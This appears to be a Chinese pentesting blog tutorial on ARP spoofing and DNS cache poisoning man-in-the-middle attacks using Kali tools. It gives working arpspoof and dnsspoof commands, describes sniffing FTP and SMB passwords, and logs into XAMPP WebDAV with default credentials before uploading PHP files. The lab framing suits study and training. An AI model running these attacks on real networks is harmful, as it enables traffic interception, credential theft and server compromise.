ARP与dns缓存攻击 --中间人攻击

Posted 2023-06-21 lisenMiller

    tips:arp的原理我也不再多赘述接下来介绍一个形成arp攻击的一个至关重要的概念--ip转发

ip转发

诱使靶机将凭证或者其他的东西发送给kali,我们需要启动kali的ip转发功能.只有这样能让kali将其他主机间的数据包转发给原有的接收方.

如果不开启ip转发功能,整个网络会出现拒绝服务的状态,正当的客户端无法访问正常的网络服务.

kali的系统中,ip转发的设置位于就/proc/sys/net/ipv4/ip_forward

echo  1 > /proc/sys/net/ipv4/ip_forward

tips:开展arp攻击前,靶机的arp缓存中必须要由相应的条目,攻击后,会强制更新为kali主机的mac地址

arp攻击以及arpspoof工具

将选项-i设置成相应的网卡,并将-t选项设置成受害者ip,指定主机为受害者的主机 然后再添加一个ip是指向ip,即是数据包截获之后的流向ip

实例

arpspoof -i ens33 -t victim\'s ip 流向ip
arpspoof -i ens33 -t 10.10.10.1 10.10.10.3
#截获10.10.10.1的数据包并发向10.10.10.3

开启arp中间人后可以开启wireshark进行抓包,抓包利用对例如ftp的账号密码,smb的账号密码等等进行抓取

也可以冒充网关进行中间人攻击

DNS缓存攻击

其实也是中间人攻击,要求都是再某个局域网内或者内网内

利用工具 dnsspoof

实例

1.首先创建要给host.txt文件并写上
kali\'s ip     www.xxx.com
2.开启dnsspoof工具进行中间人攻击
dnsspoof -i ens33 -f host.txt

利用webdav的默认口令

XAMPP（Apache+MySQL+PHP+PERL）是一个功能强大的建站集成软件包。这个软件包原来的名字是 LAMPP，但是为了避免误解，最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris、Mac OS X 等多种操作系统下安装使用，支持多语言：英文、简体中文、繁体中文、韩文、俄文、日文等。

许多人通过他们自己的经验认识到安装 Apache 服务器是件不容易的事儿。如果您想添加 MySQL、PHP 和 Perl，那就更难了。XAMPP 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和使用：只需下载，解压缩，启动即可。
xampp的默认账户密码是wampp xampp 进行登录

在命令行登录 cadaver登录

cadaver http://10.10.10.1/webdav 

authentication required for xampp with webdav on server 10.10.10.1:

username : wampp

password: xampp

dva:/webdav/> #成功登录

然后尝试上传php等文件